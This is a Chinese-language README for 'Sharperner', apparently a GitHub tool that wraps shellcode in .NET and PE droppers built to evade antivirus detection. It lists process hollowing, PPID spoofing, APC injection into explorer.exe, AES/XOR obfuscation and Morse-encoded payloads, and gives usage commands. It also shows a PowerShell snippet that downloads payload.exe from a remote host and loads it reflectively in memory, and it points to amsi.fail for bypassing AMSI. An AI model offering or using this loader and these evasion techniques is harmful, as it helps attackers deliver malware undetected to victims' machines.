aniqfakhrul/Sharperner

Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 Shellcode 生成 .NET Dropper。生成的可执行文件可能会绕过签名检查,但我不能确定它是否可以绕过启发式扫描

特征

PE二进制

  • 过程空心化
  • PPID 欺骗
  • 随机生成的 AES 密钥和 iv
  • 最终的 Shellcode、Key 和 IV 被翻译成摩斯码 :)

    .NET 二进制文件

  • AES + XOR 加密的 shellcode

  • APC 进程注入 (explorer.exe)
  • 随机函数名
  • 随机生成的 AES 密钥和 iv
  • 最终的 Shellcode、Key 和 IV 被翻译成摩斯码 :)

    用法

    1. /file B64,hex,raw shellcode
    2. /type cs,cpp
    3. /out Output file Location (Optional)
    4. Example:
    5. Sharperner.exe /file:file.txt /type:cpp
    6. Sharperner.exe /file:file.txt /out:payload.exe

    建议

    为避免接触磁盘,生成的 .NET 可执行文件可以使用 powershell 反射加载。AMSI现在是敌人,amsi.fail ftw! ```csharp $data = (New-Object System.Net.WebClient).DownloadData(‘http://10.10.10.10/payload.exe‘) $assem = [System.Reflection.Assembly]::Load($data)

```